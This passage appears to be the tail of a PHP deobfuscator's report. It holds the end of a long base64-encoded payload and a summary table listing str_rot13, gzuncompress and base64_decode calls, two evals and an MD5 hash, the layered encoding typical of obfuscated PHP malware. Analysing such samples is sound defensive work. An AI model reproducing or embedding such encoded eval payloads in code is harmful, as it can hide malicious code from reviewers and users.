fisvFlwUm55TNL2PyQwmQDTzQq5rL0XC83BnXbAy5IW2R0m3N/fMf/6DUEFWzb9vGEog/VtNIIKTrPJyM0KlXbkQLtsbgCoBpRy08xFMfrvCHP2fg8bVEtURiIxjXBRsZh4Y1uTJ+N/qBMzY6mHq6VmBiLCCoJmu1TNCxp1I0czM8oejlwLUHgBpMVIaOkQDRU+MWOo4I3rTvdiEz2ZyZFPtnWX6yjQTIFH7SFcnyk/2H8pN9c5oW8pMt+EkxmOUTNStGUkymF1SmkTSXf0JZxuXGLFF9paj6zwVRCvAz88hMZ/iZzgSy8TwseemTlsZ//uN/0xFkZgljpwnEiVhGjYiTAMXzGHgvDi4yhx5qUROPbMIX1ki6Nc7RvZPFdxpeuq7Zlue18VivjTXzijMq/f/NZ4Dp'
)
)
);
Function Calls
| str_rot13 | 1 |
| gzuncompress | 2 |
| base64_decode | 2 |
Stats
| MD5 | b7c1330dbacd3b8bfba49e60de26acd1 |
| Eval Count | 2 |
| Decode Time | 279 ms |